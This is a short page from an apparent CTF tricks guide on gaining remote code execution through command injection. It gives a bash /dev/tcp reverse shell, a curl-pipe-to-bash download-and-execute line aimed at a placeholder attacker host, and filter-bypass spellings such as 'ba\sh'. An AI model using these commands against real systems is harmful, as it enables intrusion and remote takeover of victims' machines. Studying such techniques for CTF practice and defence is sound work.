> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/rce/initial-access-rce-command-injection.md).

# Command Injection

## RCE via Command Injection Bypass

Host a script containing your reverse shell payload on your attacker machine. A common method to achieve this is by hosting a script (e.g., `shell.sh`) on your attacker machine and having the target download and execute it. You can set up a simple HTTP server for this purpose using `python3 -m http.server`.

The script (`shell.sh`) would typically contain a command like the standard bash reverse shell:

```bash
bash -i >& /dev/tcp/<Attacker IP>/<Port> 0>&1
```

Once the script is hosted, you can use a command injection vulnerability on the target machine to download this script using `curl` and pipe it directly into a shell interpreter like `bash`. The `curl` command downloads the script content, and the pipe `|` sends the content of the script to `bash`, which then executes the script.

The core command injected would typically look like this:

```bash
curl http://<attacker_ip>:<port>/shell.sh | bash
```

To bypass potential blacklists or filters on the `bash` command itself, various techniques can be employed. For example, the `ba\sh` syntax is a common way to bypass blacklists on `bash`. Other variations can also be effective, such as using quotes or escaping characters within the interpreter name.

Examples of commands using such bypasses include:

```bash
curl <Attacker IP>:<Port>/shell.sh | ba\sh
```

```bash
curl <Attacker IP>:<Port>/shell.sh | b''ash''
```

This downloads the script's content and executes it directly using the chosen `bash` command variation, establishing the reverse shell.
